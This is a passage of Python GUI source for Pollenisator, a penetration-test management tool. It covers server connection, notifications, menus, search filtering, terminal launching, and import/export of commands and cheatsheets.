self.scanManager.startAutoscan()\n\n def stop_autoscan(self):\n return self.scanManager.stop()\n\n # OVERRIDE tk.Tk.report_callback_exception\n def report_callback_exception(self, exc, val, tb):\n self.show_error(exc, val, tb)\n \n def quit(self):\n super().quit()\n self.quitting = True\n return\n\n def forceUpdate(self, api_version, my_version):\n tkinter.messagebox.showwarning(\"Update necessary\", f\"Clash of version. Expecting API {api_version} and you are compatible with {my_version}. Please reinstall following the instructions in README. (git pull; pip install .)\")\n\n def openConnectionDialog(self, force=False):\n # Connect to database and choose database to open\n apiclient = APIClient.getInstance()\n abandon = False\n connectionTest = apiclient.tryConnection(force=force)\n if force:\n apiclient.disconnect()\n res = apiclient.tryAuth()\n if not res: \n apiclient.disconnect()\n while (not connectionTest or not apiclient.isConnected()) and not abandon:\n abandon = self.promptForConnection() is None\n connectionTest = apiclient.tryConnection(force=force)\n if not abandon:\n apiclient = APIClient.getInstance()\n apiclient.attach(self)\n srv_version = apiclient.getVersion()\n if int(Appli.version_compatible.split(\".\")[0]) != int(srv_version.split(\".\")[0]):\n self.forceUpdate(srv_version, Appli.version_compatible)\n self.onClosing()\n return False, True\n if int(Appli.version_compatible.split(\".\")[1]) != int(srv_version.split(\".\")[1]):\n self.forceUpdate(srv_version, Appli.version_compatible)\n self.onClosing()\n return False, True\n if self.sio is not None:\n self.sio.disconnect()\n self.sio = socketio.Client()\n @self.sio.event\n def notif(data):\n self.handleNotif(json.loads(data, cls=utils.JSONDecoder))\n \n @self.sio.event\n def test(data):\n tk.messagebox.showinfo(\"test\", \"test socket working received data : \"+str(data))\n \n self.sio.connect(apiclient.api_url)\n pentests = apiclient.getPentestList()\n if pentests is None:\n pentests = []\n else:\n pentests_names = [x[\"nom\"] for x in pentests][::-1]\n if apiclient.getCurrentPentest() != \"\" and apiclient.getCurrentPentest() in pentests_names:\n self.openPentest(apiclient.getCurrentPentest())\n else:\n self.openPentestsWindow(pentests=pentests)\n self.initialized = True\n else:\n self.onClosing()\n try:\n self.destroy()\n except 
tk.TclError:\n pass\n return apiclient.isConnected(), False\n \n def initModules(self):\n discovered_plugins = {\n name: importlib.import_module(name)\n for finder, name, ispkg\n in iter_namespace(pollenisatorgui.modules) if not name.endswith(\".Module\")\n }\n self.modules = []\n from pollenisatorgui.modules.module import REGISTRY\n for name, module_class in REGISTRY.items():\n if name != \"Module\":\n module_obj = module_class(self, self.settings)\n self.modules.append({\"name\": module_obj.tabName, \"object\":module_obj, \"view\":None, \"img\":CTkImage(Image.open(utils.getIconDir()+module_obj.iconName), size=(30, 30))})\n \n def loadModulesInfos(self):\n for module in self.modules:\n if callable(getattr(module[\"object\"], \"loadModuleInfo\", False)):\n module[\"object\"].loadModuleInfo()\n\n def show_error(self, *args):\n \"\"\"Callback for tk.Tk.report_callback_exception.\n Open a window to display exception with some actions possible\n\n Args:\n args: 3 args are required for tk.Tk.report_callback_exception event to be given to traceback.format_exception(args[0], args[1], args[2])\n \n Raises:\n If an exception occurs in this handler thread, will print it and exit with exit code 1\n \"\"\"\n try:\n err = traceback.format_exception(args[0], args[1], args[2])\n err = \"\\n\".join(err)\n \n if args[0] is ErrorHTTP: # args[0] is class of ecx\n if args[1].response.status_code == 401:\n tk.messagebox.showerror(\"Disconnected\", \"You are not connected.\")\n self.openConnectionDialog(force=True)\n return\n dialog = ChildDialogException(self, 'Exception occured', err)\n apiclient = APIClient.getInstance()\n apiclient.reportError(err)\n try:\n self.wait_window(dialog.app)\n except tk.TclError:\n sys.exit(1)\n except Exception as e:\n print(\"Exception in error handler \"+str(e))\n sys.exit(1)\n \n \n def promptForConnection(self):\n \"\"\"Close current database connection and open connection form for the user\n \n Returns: \n The number of pollenisator database found, 0 if the connection failed.\"\"\"\n apiclient = APIClient.getInstance()\n apiclient.reinitConnection()\n connectDialog = ChildDialogConnect(self)\n self.wait_window(connectDialog.app)\n return connectDialog.rvalue\n\n def changeMyPassword(self):\n \"\"\"Allows the current user to change its password\"\"\"\n apiclient = APIClient.getInstance()\n connected_user = apiclient.getUser()\n if connected_user is None:\n tk.messagebox.showerror(\"Change password\", \"You are not connected\")\n return \n dialog = ChildDialogEditPassword(self, connected_user)\n self.wait_window(dialog.app)\n \n def disconnect(self):\n \"\"\"Remove the session cookie\"\"\"\n APIClient.getInstance().disconnect()\n \n self.openConnectionDialog(force=True)\n\n def submitIssue(self):\n \"\"\"Open git issues in browser\"\"\"\n import webbrowser\n webbrowser.open_new_tab(\"https://github.com/AlgoSecure/Pollenisator/issues\")\n\n def notify(self, notification):\n for notif_handler in self.notif_handlers:\n if notif_handler[\"pentest\"] is not None and notif_handler[\"pentest\"] != notification[\"db\"]:\n continue\n if notif_handler[\"collection\"] is not None and notif_handler[\"collection\"] != notification[\"collection\"]:\n continue\n if notif_handler[\"iid\"] is not None and notif_handler[\"iid\"] != str(notification[\"iid\"]):\n continue\n if notif_handler[\"notif_name\"] is not None and notif_handler[\"notif_name\"] != notification[\"action\"]:\n continue\n \n notif_handler[\"handler\"](notification)\n \n def subscribe_notification(self, notif_name, handler, 
pentest=None, collection=None, iid=None):\n if handler is None:\n return\n self.notif_handlers.append({\"pentest\":pentest, \"collection\":collection, \"iid\":iid, \"notif_name\":notif_name, \"handler\":handler})\n \n def unsubscribe_notification(self, notif_name, pentest=None, collection=None, iid=None):\n i = 0\n while self.notif_handlers and i < len(self.notif_handlers):\n notif_handler = self.notif_handlers[i]\n if notif_handler[\"pentest\"] == pentest and notif_handler[\"notif_name\"] == notif_name \\\n and notif_handler[\"collection\"] == collection and str(notif_handler[\"iid\"]) == str(iid): \n del self.notif_handlers[i]\n else:\n i+=1\n\n def handleNotif(self, notification):\n self.notify(notification)\n self.datamanager.handleNotification(notification)\n \n def onClosing(self):\n \"\"\"\n Close the application properly.\n \"\"\"\n if self.quitting:\n return\n self.quitting = True\n self.closePentest()\n print(\"Stopping application...\")\n if self.sio is not None:\n self.sio.disconnect()\n self.sio.eio.disconnect()\n self.quit()\n\n def reopen(self, event=None):\n self.treevw.reopen()\n\n def _initMenuBar(self):\n \"\"\"\n Create the bar menu on top of the screen.\n \"\"\"\n menubar = utils.craftMenuWithStyle(self)\n self.configure(menu=menubar)\n\n self.bind('<F5>', self.refreshView)\n self.bind('<F6>', self.reopen)\n self.bind('<Control-o>', self.openPentestsWindow)\n fileMenu = utils.craftMenuWithStyle(menubar)\n fileMenu.add_command(label=\"Pentests management (Ctrl+o)\",\n command=self.openPentestsWindow)\n fileMenu.add_command(label=\"Connect to server\", command=self.promptForConnection)\n fileMenu.add_command(label=\"Export commands\",\n command=self.exportCommands)\n fileMenu.add_command(label=\"Import commands\",\n command=self.importCommands)\n fileMenu.add_command(label=\"Export cheatsheet\",\n command=self.exportCheatsheet)\n fileMenu.add_command(label=\"Import cheatsheet\",\n command=self.importCheatsheet)\n fileMenu.add_command(label=\"Import defect templates\",\n command=self.importDefectTemplates) \n\n fileMenu.add_command(label=\"Exit\", command=self.onClosing)\n fileMenu2 = utils.craftMenuWithStyle(menubar)\n fileMenu2.add_command(label=\"Import existing tools results ...\",\n command=self.importExistingTools)\n fileMenu2.add_command(label=\"Reset unfinished tools\",\n command=self.resetUnfinishedTools)\n fileMenu2.add_command(label=\"Test local tools\",\n command=self.wrapperTestLocalTools)\n fileMenu2.add_command(label=\"Refresh (F5)\",\n command=self.refreshView)\n fileMenuUser = utils.craftMenuWithStyle(menubar)\n fileMenuUser.add_command(label=\"Change your password\",\n command=self.changeMyPassword)\n fileMenuUser.add_command(label=\"Disconnect\", command=self.disconnect)\n fileMenu3 = utils.craftMenuWithStyle(menubar)\n fileMenu3.add_command(label=\"Submit a bug or feature\",\n command=self.submitIssue)\n fileMenuDebug = utils.craftMenuWithStyle(menubar)\n fileMenuDebug.add_command(label=\"Socket test\", command=self.socketTest)\n menubar.add_cascade(label=\"Database\", menu=fileMenu)\n menubar.add_cascade(label=\"Scans\", menu=fileMenu2)\n menubar.add_command(label=\"Scripts...\", command=self.openScriptModule)\n menubar.add_cascade(label=\"User\", menu=fileMenuUser)\n menubar.add_cascade(label=\"Help\", menu=fileMenu3)\n menubar.add_cascade(label=\"Debug\", menu=fileMenuDebug)\n \n def socketTest(self):\n print(\"EMIT TEST\")\n self.sio.emit(\"test\", {\"pentest\": APIClient.getInstance().getCurrentPentest()})\n print(\"TEST SENT, WAITING FOR 
RESPONSE\")\n\n \n\n\n def initMainView(self):\n \"\"\"\n Fill the main view tab menu\n \"\"\"\n self.mainPageFrame = CTkFrame(self.topviewframe)\n searchFrame = CTkFrame(self.mainPageFrame, fg_color=utils.getBackgroundSecondColor())\n filterbar_frame = CTkFrame(searchFrame, fg_color=\"transparent\")\n self.image_filter = CTkImage(Image.open(utils.getIcon(\"filter.png\")))\n lblSearch = CTkLabel(filterbar_frame, text=\"Filter bar\", image=self.image_filter, compound = \"left\")\n lblSearch.pack(side=\"left\", fill=tk.NONE)\n self.searchBar = AutocompleteEntry(self.settings, filterbar_frame)\n #self.searchBar = PopoEntry(filterbar_frame, width=108)\n self.searchBar.bind('<Return>', self.newSearch)\n self.searchBar.bind('<KP_Enter>', self.newSearch)\n # searchBar.bind(\"<Button-3>\", self.do_popup)\n self.searchBar.pack(side=\"left\", fill=\"x\", expand=True)\n self.quickSearchVal = tk.BooleanVar()\n self.quickSearchVal.set(self.settings.local_settings.get(\"quicksearch\", False))\n \n checkbox_quick_search = CTkSwitch(filterbar_frame, text=\"Quick search\", variable=self.quickSearchVal, command=self.quickSearchChanged)\n checkbox_quick_search.pack(side=\"left\", padx=5)\n self.keep_parents_val = tk.BooleanVar()\n self.keep_parents_val.set(self.settings.local_settings.get(\"keep_parents\", True))\n checkbox_keep_parent = CTkSwitch(filterbar_frame, text=\"Keep parents\", variable=self.keep_parents_val, command=self.keepParentsChanged)\n checkbox_keep_parent.pack(side=\"left\", padx=5)\n self.search_icon = tk.PhotoImage(file=utils.getIcon(\"search.png\"))\n btnSearchBar = ttk.Button(filterbar_frame, text=\"\", image=self.search_icon, style=\"iconbis.TButton\", tooltip=\"Filter elements based of complex query or only text if quicksearch is selected\", width=10, command=self.newSearch)\n btnSearchBar.pack(side=\"left\", fill=\"x\")\n image=Image.open(utils.getIcon(\"reset_small.png\"))\n self.reset_icon = ImageTk.PhotoImage(image)\n btnReset = ttk.Button(filterbar_frame, image=self.reset_icon, text=\"\", style=\"iconbis.TButton\", tooltip=\"Reset search bar filter\", width=10, command=self.resetButtonClicked)\n btnReset.pack(side=\"left\", fill=\"x\")\n self.photo = CTkImage(Image.open(utils.getHelpIconPath()))\n self.helpFrame = None\n self.btnHelp = CTkButton(filterbar_frame, text=\"\",image=self.photo, fg_color=\"transparent\", width=10, command=self.showSearchHelp)\n\n self.btnHelp.pack(side=\"left\")\n filterbar_frame.pack(side=tk.TOP,fill=tk.X)\n self.statusbar = StatusBar(searchFrame, self.statusbarClicked)\n self.statusbar.pack(side=tk.BOTTOM, fill=tk.X)\n searchFrame.pack(side=\"top\", fill=\"x\")\n #PANED PART\n self.paned = tk.PanedWindow(self.mainPageFrame, orient=\"horizontal\")\n #RIGHT PANE : Canvas + frame\n \n self.proxyFrameMain = CTkFrame(self.paned)\n self.proxyFrameMain.rowconfigure(0, weight=1) \n self.proxyFrameMain.columnconfigure(0, weight=1) \n self.viewframe = ScrollableFrameXPlateform(self.proxyFrameMain)\n \n \n #LEFT PANE : Treeview\n self.left_pane = CTkFrame(self.paned)\n self.frameTw = CTkFrame(self.left_pane)\n self.frameTw.rowconfigure(1, weight=1) # Weight 1 sur un layout grid, sans ça le composant ne changera pas de taille en cas de resize\n self.frameTw.columnconfigure(0, weight=1) # Weight 1 sur un layout grid, sans ça le composant ne changera pas de taille en cas de resize\n self.treevw = PentestTreeview(self, self.frameTw)\n frameContext = CTkFrame(self.frameTw)\n self.btn_context = CTkSegmentedButton(frameContext, values=[\"Hosts\", \"Checklist\"], 
width=200, height=45, command=self.checklistViewSwap)\n        self.btn_context.set(\"Check\" if self.settings.is_checklist_view() else \"Hosts\")\n        self.btn_context.pack(side=\"left\")\n        frameContext.grid(row=0, column=0)\n        self.treevw.initUI()\n        self.scbVSel = CTkScrollbar(self.frameTw,\n                                orientation=tk.VERTICAL,\n                                command=self.treevw.yview)\n        self.treevw.configure(yscrollcommand=self.scbVSel.set)\n        self.treevw.grid(row=1, column=0, sticky=tk.NSEW)\n        self.scbVSel.grid(row=1, column=1, sticky=tk.NS)\n        # FILTER PANE:\n        # self.filtersFrame = CTkFrame(self.left_pane)\n        # self.initFiltersFrame(self.filtersFrame)\n        # self.filtersFrame.pack(side=\"bottom\", fill=\"x\")\n        # END PANE PREP\n        self.frameTw.pack(side=\"top\", fill=tk.BOTH, expand=True)\n        \n        self.left_pane.pack(side=\"left\", fill=tk.BOTH, expand=True)\n        self.paned.add(self.left_pane)\n        self.proxyFrameMain.pack(side=\"right\", fill=tk.BOTH, expand=True)\n        self.viewframe.pack(fill=tk.BOTH, expand=1)\n        \n        self.paned.add(self.proxyFrameMain)\n\n        self.paned.pack(fill=tk.BOTH, expand=1)\n        self.mainPageFrame.pack(fill=\"both\", expand=True)\n        self.nbk.add(self.mainPageFrame, \"Main View\", order=Module.HIGH_PRIORITY, image=self.main_tab_img)\n\n    def searchbarSelectAll(self, _event=None):\n        \"\"\"\n        Callback to select all the text in searchbar\n        Args:\n            _event: not used but mandatory\n        \"\"\"\n        self.searchBar.select_range(0, 'end')\n        self.searchBar.icursor('end')\n        return \"break\"\n\n    \n    def checklistViewSwap(self, _event=None):\n        is_checklist_view = \"Check\" in self.btn_context.get()\n        settings = Settings()\n        settings.local_settings[\"checklist_view\"] = is_checklist_view\n        settings.saveLocalSettings()\n        self.treevw.checklistViewSwap()\n\n\n    def initCommandsView(self):\n        \"\"\"Populate the command tab menu view frame with cool widgets\"\"\"\n        self.commandsPageFrame = CTkFrame(self.topviewframe)\n        self.commandPaned = tk.PanedWindow(self.commandsPageFrame, height=800)\n        self.commandsFrameTw = CTkFrame(self.commandPaned)\n        self.proxyFrameCommand = CTkFrame(self.commandPaned)\n        self.commandsFrameTw.pack(expand=True)\n        self.commandsViewFrame = ScrollableFrameXPlateform(self.proxyFrameCommand)\n        self.commandsTreevw = CommandsTreeview(self, self.commandsFrameTw)\n        scbVSel = CTkScrollbar(self.commandsFrameTw,\n                                orientation=tk.VERTICAL,\n                                command=self.commandsTreevw.yview)\n        self.commandsTreevw.configure(yscrollcommand=scbVSel.set)\n        self.commandsTreevw.grid(row=0, column=0, sticky=tk.NSEW)\n        scbVSel.grid(row=0, column=1, sticky=tk.NS)\n        self.commandPaned.add(self.commandsFrameTw)\n        self.commandsViewFrame.pack(fill=tk.BOTH, expand=1)\n        self.commandPaned.add(self.proxyFrameCommand)\n        self.commandPaned.pack(fill=tk.BOTH, expand=1)\n        self.commandsFrameTw.rowconfigure(0, weight=1) # Weight 1 on a grid layout; without it the widget will not resize\n        self.commandsFrameTw.columnconfigure(0, weight=1) # Weight 1 on a grid layout; without it the widget will not resize\n        self.nbk.add(self.commandsPageFrame, \"Commands\", order=Module.LOW_PRIORITY, image=self.commands_tab_img)\n\n\n    def showSearchHelp(self, _event=None):\n        \"\"\"Called when the searchbar help button is clicked. 
Display a floating help window with examples\n Args:\n _event: not used but mandatory\n \"\"\"\n if self.helpFrame is None:\n x, y = self.btnHelp.winfo_rootx(), self.btnHelp.winfo_rooty()\n self.helpFrame = FloatingHelpWindow(410, 400, x-380, y+40, self)\n else:\n self.helpFrame.destroy()\n self.helpFrame = None\n\n def beforeTabSwitch(self, current, new):\n if current is None:\n return\n for module in self.modules:\n if current.strip().lower() == module[\"name\"].strip().lower():\n if hasattr(module[\"object\"], \"close\"):\n module[\"object\"].close()\n\n def tabSwitch(self, tabName):\n \"\"\"Called when the user click on the tab menu to switch tab. Add a behaviour before the tab switches.\n Args:\n tabName: the opened tab\n \"\"\"\n apiclient = APIClient.getInstance()\n self.searchBar.quit()\n if tabName == \"Main View\":\n self.refreshUI()\n if tabName == \"Commands\":\n self.commandsTreevw.initUI()\n if apiclient.getCurrentPentest() is None or apiclient.getCurrentPentest() == \"\":\n opened = self.openPentestsWindow()\n if opened is None:\n return\n if tabName == \"Scan\":\n if apiclient.getCurrentPentest() != \"\":\n self.scanManager.refreshUI()\n elif tabName == \"Settings\":\n self.settings.reloadUI()\n elif tabName == \"Admin\":\n self.admin.refreshUI()\n else:\n for module in self.modules:\n if tabName.strip().lower() == module[\"name\"].strip().lower():\n module[\"object\"].open()\n\n def initSettingsView(self):\n \"\"\"Add the settings view frame to the notebook widget and initialize its UI.\"\"\"\n self.settingViewFrame = CTkFrame(self.topviewframe)\n self.settings.initUI(self.settingViewFrame)\n self.nbk.add(self.settingViewFrame, \"Settings\", order=Module.LAST_PRIORITY, image=self.settings_tab_img)\n\n def initScanView(self):\n \"\"\"Add the scan view frame to the notebook widget. This does not initialize it as it needs a database to be opened.\"\"\"\n self.scanViewFrame = CTkFrame(self.topviewframe)\n self.scanManager.initUI(self.scanViewFrame)\n self.nbk.add(self.scanViewFrame, \"Scan\", order=Module.HIGH_PRIORITY, image=self.scan_tab_img)\n\n def initAdminView(self):\n \"\"\"Add the admin button to the notebook\"\"\"\n self.admin = AdminView(self.topviewframe)\n self.adminViewFrame = CTkFrame(self.topviewframe)\n self.admin.initUI(self.adminViewFrame)\n self.nbk.add(self.adminViewFrame, \"Admin\", order=Module.LOW_PRIORITY, image=self.admin_tab_img)\n\n def openScriptModule(self):\n \"\"\"Open the script window\"\"\"\n self.scriptManager = ScriptManager()\n self.scriptManager.initUI(self)\n self.wait_window(self.scriptManager.app)\n\n def initUI(self):\n \"\"\"\n initialize all the main windows objects. 
(Bar Menu, contextual menu, treeview, editing pane)\n \"\"\"\n if self.nbk is not None:\n self.refreshUI()\n return\n self.nbk = ButtonNotebook(self, self.tabSwitch, self.beforeTabSwitch)\n self.panedTerminals = ttk.PanedWindow(self.nbk, orient=\"vertical\")\n self.topviewframe = CTkFrame(self.panedTerminals)\n self.terminals = TerminalsWidget(self.panedTerminals, self, height=200)\n \n self.initMainView()\n self.initAdminView()\n self.initCommandsView()\n self.initScanView()\n self.initSettingsView()\n\n for module in self.modules:\n module[\"view\"] = CTkFrame(self.topviewframe)\n module[\"object\"].initUI(module[\"view\"], self.topviewframe, self.treevw, tkApp=self)\n for module in self.modules:\n self.nbk.add(module[\"view\"], module[\"name\"].strip(), order=module[\"object\"].__class__.order_priority, image=module[\"img\"])\n self.terminals.pack(side=tk.BOTTOM, fill=tk.BOTH, expand=1)\n self.topviewframe.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n self.panedTerminals.add(self.topviewframe, weight=1)\n self.panedTerminals.add(self.terminals, weight=0)\n \n self.panedTerminals.pack(fill=tk.BOTH, expand=True)\n \n\n \n self._initMenuBar()\n self.nbk.pack(fill=tk.BOTH, expand=1)\n self.terminals.open_terminal()\n\n\n def refreshUI(self):\n for widget in self.viewframe.winfo_children():\n widget.destroy()\n \n self.left_pane.update()\n self.after(50, lambda: self.paned.paneconfigure(self.left_pane, height=self.left_pane.winfo_reqheight()))\n self.treevw.refresh()\n self.treevw.filter_empty_nodes()\n self.statusbar.refreshTags(Settings.getTags(ignoreCache=True))\n # self.nbk.select(\"Main View\")\n\n def open_terminal(self, iid, title):\n self.terminals.open_terminal(iid, title)\n\n def execute_in_terminal(self, title, commandline):\n iid = uuid.uuid4()\n self.terminals.open_terminal(iid, title, enable_trap=False)\n self.terminals.launch_in_terminal(iid, commandline, use_pollex=False)\n\n def launch_in_terminal(self, iid, title, commandline, use_pollex=True):\n if iid is None:\n iid = uuid.uuid4()\n self.terminals.open_terminal(iid, title, enable_trap=use_pollex)\n self.terminals.launch_in_terminal(iid, commandline, use_pollex=use_pollex)\n return iid\n\n def launch_tool_in_terminal(self, tool_model, command):\n self.terminals.open_terminal(str(tool_model.check_iid)+\"|\"+str(tool_model.getId()), ToolController(tool_model).getDetailedString())\n self.terminals.launch_in_terminal(str(tool_model.check_iid)+\"|\"+str(tool_model.getId()), command)\n\n def open_ro_terminal(self, check_iid, title, tool_controller, scanManager):\n self.terminals.open_ro_terminal(check_iid, title, tool_controller, scanManager)\n\n def open_any_terminal(self, iid, title, tool_controller, scanManager):\n self.terminals.open_any_terminal(iid, title, tool_controller, scanManager)\n \n def quickSearchChanged(self, event=None):\n \"\"\"Called when the quick search bar is modified. Change settings\n Args:\n event: not used but mandatory\n \"\"\"\n self.settings.local_settings[\"quicksearch\"] = int(self.quickSearchVal.get())\n self.settings.saveLocalSettings()\n\n def keepParentsChanged(self, event=None):\n \"\"\"Called when the keep parent switch is modified. 
Change settings\n Args:\n event: not used but mandatory\n \"\"\"\n self.settings.local_settings[\"keep_parents\"] = int(self.keep_parents_val.get())\n self.settings.saveLocalSettings()\n \n def newSearch(self, _event=None, histo=True, quick_search_allowed=True):\n \"\"\"Called when the searchbar is validated (click on search button or enter key pressed).\n Perform a filter on the main treeview.\n Args:\n _event: not used but mandatory\"\"\"\n filterStr = self.searchBar.get()\n if filterStr.strip() == \"\":\n self.resetButtonClicked()\n return\n self.settings.reloadSettings()\n success = self.treevw.filterTreeview(filterStr, self.settings, quick_search_allowed)\n self.searchMode = (success and filterStr.strip() != \"\")\n if success:\n if histo:\n histo_filters = self.settings.local_settings.get(\"histo_filters\", [])\n if filterStr.strip() != \"\":\n histo_filters.insert(0, filterStr)\n if len(histo_filters) > 10:\n histo_filters = histo_filters[:10]\n self.settings.local_settings[\"histo_filters\"] = histo_filters\n self.settings.saveLocalSettings()\n if self.helpFrame is not None:\n self.helpFrame.destroy()\n self.helpFrame = None\n\n def statusbarClicked(self, name):\n \"\"\"Called when a button in the statusbar tag is clicked.\n filter the treeview to match the status bar tag clicked and enforce select of main view\n Args:\n name: not used but mandatory\"\"\"\n # get the index of the mouse click\n datamanager = DataManager.getInstance()\n taggeds = datamanager.get(\"tags\", \"*\")\n tagged_items = []\n tagged_types = set()\n for tagged in taggeds.values():\n for tag in tagged.tags:\n if not isinstance(tag, str):\n tag = tag[0]\n if tag == name:\n tagged_items.append(tagged)\n tagged_types.add(tagged.item_type)\n for module in self.modules:\n for tagged_type in tagged_types:\n if tagged_type.lower() in getattr(module[\"object\"], \"classes\", []):\n if hasattr(module[\"object\"], \"statusbarClicked\"):\n self.nbk.select(module[\"name\"].strip())\n module[\"object\"].statusbarClicked(name)\n return\n # default \n self.nbk.select(\"Main View\")\n self.search(\"\\\"\"+name+\"\\\" in tags\")\n\n def modelToView(self, collection, model):\n \"\"\"Return the view of a model\"\"\"\n for module in self.modules:\n if collection.lower() == getattr(module[\"object\"], \"coll_name\", \"\").lower() or collection.lower() in getattr(module[\"object\"], \"classes\", \"\"):\n return module[\"object\"].modelToView(collection, model)\n return self.treevw.modelToView(collection, model)\n \n def search(self, filter_str):\n self.nbk.select(\"Main View\")\n self.searchMode = True\n self.searchBar.delete(0, tk.END)\n self.searchBar.insert(tk.END, filter_str)\n self.newSearch(histo=False, quick_search_allowed=False)\n\n def resetButtonClicked(self):\n \"\"\"\n Called when the reset button of the status bar is clicked.\n \"\"\"\n self.searchMode = False\n self.searchBar.reset()\n self.treevw.unfilterAll()\n\n def refreshView(self, _event=None):\n \"\"\"\n Reload the currently opened tab\n Args:\n _event: not used but mandatory\n \"\"\"\n setViewOn = None\n nbkOpenedTab = self.nbk.getOpenTabName()\n activeTw = None\n if nbkOpenedTab == \"Main View\":\n activeTw = self.treevw\n elif nbkOpenedTab == \"Commands\":\n activeTw = self.commandsTreevw\n elif nbkOpenedTab == \"Scan\":\n self.scanManager.initUI(self.scanViewFrame)\n elif nbkOpenedTab == \"Settings\":\n self.settings.reloadUI()\n else:\n for module in self.modules:\n if nbkOpenedTab.strip().lower() == module[\"name\"].strip().lower():\n 
module[\"object\"].open()\n if activeTw is not None:\n if len(activeTw.selection()) == 1:\n setViewOn = activeTw.selection()[0]\n activeTw.refresh(force=True)\n self.statusbar.refreshTags(Settings.getTags(ignoreCache=True))\n\n activeTw.filter_empty_nodes()\n if setViewOn is not None:\n try:\n activeTw.see(setViewOn)\n activeTw.focus(setViewOn)\n activeTw.selection_set(setViewOn)\n activeTw.openModifyWindowOf(setViewOn)\n except tk.TclError:\n pass\n\n def resetUnfinishedTools(self):\n \"\"\"\n Reset all running tools to a ready state.\n \"\"\"\n apiclient = APIClient.getInstance()\n if apiclient.getCurrentPentest() != \"\":\n utils.resetUnfinishedTools()\n self.treevw.load()\n\n def wrapperTestLocalTools(self):\n results = self.testLocalTools()\n dialog = ChildDialogToolsInstalled(results)\n dialog.wait_window()\n if dialog.rvalue is not None:\n self.settings.local_settings[\"my_commands\"] = dialog.rvalue\n self.settings.saveLocalSettings()\n\n def testLocalTools(self):\n \"\"\" test local binary path with which\"\"\"\n apiclient = APIClient.getInstance()\n self.settings.reloadLocalSettings()\n plugins = apiclient.getPlugins()\n results = {\"successes\":[], \"failures\":[]}\n for plugin in plugins:\n if plugin[\"plugin\"] == \"Default\":\n continue\n bin_path = self.settings.local_settings.get(\"my_commands\", {}).get(plugin[\"plugin\"])\n if bin_path is None or bin_path == \"\" or utils.which_expand_alias(bin_path):\n default_bin_names = plugin[\"default_bin_names\"]\n found_matching = False\n for default_bin_name in default_bin_names:\n if utils.which_expand_alias(default_bin_name):\n plugin[\"bin_path\"] = default_bin_name\n bin_path = default_bin_name\n results[\"successes\"].append({\"title\":\"Success\", \"plugin\":plugin, \"bin_path\":bin_path, \"default_bin\":plugin[\"default_bin_names\"], \"msg\":f\"The local settings for {plugin['plugin']} is valid. ({bin_path}).\"})\n found_matching = True\n break\n if found_matching == False:\n results[\"failures\"].append({\"title\":\"Invalid binary path\", \"plugin\":plugin, \"bin_path\":bin_path, \"default_bin\":plugin[\"default_bin_names\"], \"msg\":f\"The local settings for {plugin['plugin']} is not recognized. ({bin_path}).\"})\n else:\n results[\"successes\"].append({\"title\":\"Success\", \"plugin\":plugin, \"bin_path\":bin_path, \"default_bin\":plugin[\"default_bin_names\"], \"msg\":f\"The local settings for {plugin['plugin']} is valid. 
({bin_path}).\"})\n return results\n \n\n def exportCommands(self):\n \"\"\"\n Dump pollenisator from database to an archive file gunzip.\n \"\"\"\n dialog = ChildDialogQuestion(self, \"Ask question\", \"Do you want to export your commands or Worker's commands.\", [\"My commands\", \"Worker\"])\n self.wait_window(dialog.app)\n apiclient = APIClient.getInstance()\n res, msg = apiclient.exportCommands(self)\n if res:\n tkinter.messagebox.showinfo(\n \"Export pollenisator database\", \"Export completed in \"+str(msg))\n else:\n tkinter.messagebox.showinfo(msg)\n \n def exportCheatsheet(self):\n \"\"\"\n Dump pollenisator from database to an archive file gunzip.\n \"\"\"\n apiclient = APIClient.getInstance()\n res, msg = apiclient.exportCheatsheet(self)\n if res:\n tkinter.messagebox.showinfo(\n \"Export cheatsheet database\", \"Export completed in \"+str(msg))\n else:\n tkinter.messagebox.showinfo(msg)\n\n \n\n def findUnscannedPorts(self):\n ports = Port.fetchObjects({})\n datamanager = DataManager.getInstance()\n for port in ports:\n port_key = port.getDbKey()\n res = datamanager.find(\"tools\", port_key, multi=False)\n if res is None:\n port.setTags([\"unscanned\"])\n\n def importCommands(self, name=None):\n \"\"\"\n Import a pollenisator archive file gunzip to database.\n Args:\n name: The filename of the gunzip command table exported previously\n Returns:\n None if name is None and filedialog is closed\n True if commands successfully are imported\n False otherwise.\n \"\"\"\n filename = \"\"\n if name is None:\n f = tkinter.filedialog.askopenfilename(parent=self, defaultextension=\".json\")\n if f is None: # asksaveasfile return `None` if dialog closed with \"cancel\".\n return\n filename = str(f)\n else:\n filename = name\n try:\n dialog = ChildDialogQuestion(self, \"Ask question\", \"Do you want to import these commands for you or the worker.\", [\"Me\", \"Worker\"])\n self.wait_window(dialog.app)\n apiclient = APIClient.getInstance()\n success = apiclient.importCommands(filename, forWorker=dialog.rvalue == \"Worker\")\n self.commandsTreevw.refresh()\n except IOError:\n tkinter.messagebox.showerror(\n \"Import commands\", \"Import failed. \"+str(filename)+\" was not found or is not a file.\")\n return False\n if not success:\n tkinter.messagebox.showerror(\"Command import\", \"Command import failed\")\n else:\n tkinter.messagebox.showinfo(\"Command import\", \"Command import completed\")\n return success\n\n def importCheatsheet(self, name=None):\n \"\"\"\n Import a pollenisator cheatsheet file json to database.\n Args:\n name: The filename of the json command table exported previously\n Returns:\n None if name is None and filedialog is closed\n True if commands successfully are imported\n False otherwise.\n \"\"\"\n filename = \"\"\n if name is None:\n f = tkinter.filedialog.askopenfilename(parent=self, defaultextension=\".json\")\n if f is None: # asksaveasfile return `None` if dialog closed with \"cancel\".\n return\n filename = str(f)\n else:\n filename = name\n try:\n apiclient = APIClient.getInstance()\n success = apiclient.importCheatsheet(filename)\n except IOError:\n tkinter.messagebox.showerror(\n \"Import Cheatsheet\", \"Import failed. 
\"+str(filename)+\" was not found or is not a file.\")\n return False\n if not success:\n tkinter.messagebox.showerror(\"Cheatsheet import\", \"Cheatsheet import failed\")\n else:\n tkinter.messagebox.showinfo(\"Cheatsheet import\", \"Cheatsheet import completed\")\n return success\n\n def importDefectTemplates(self, name=None):\n \"\"\"\n Import defect templates from a json\n Args:\n name: The filename of the json containing defect templates\n Returns:\n None if name is None and filedialog is closed\n True if defects successfully are imported\n False otherwise.\n \"\"\"\n filename = \"\"\n if name is None:\n f = tkinter.filedialog.askopenfilename(defaultextension=\".json\")\n if f is None: # asksaveasfile return `None` if dialog closed with \"cancel\".\n return\n filename = str(f)\n else:\n filename = name\n try:\n apiclient = APIClient.getInstance()\n success = apiclient.importDefectTemplates(filename)\n except IOError:\n tkinter.messagebox.showerror(\n \"Import defects templates\", \"Import failed. \"+str(filename)+\" was not found or is not a file.\")\n return False\n if not success:\n 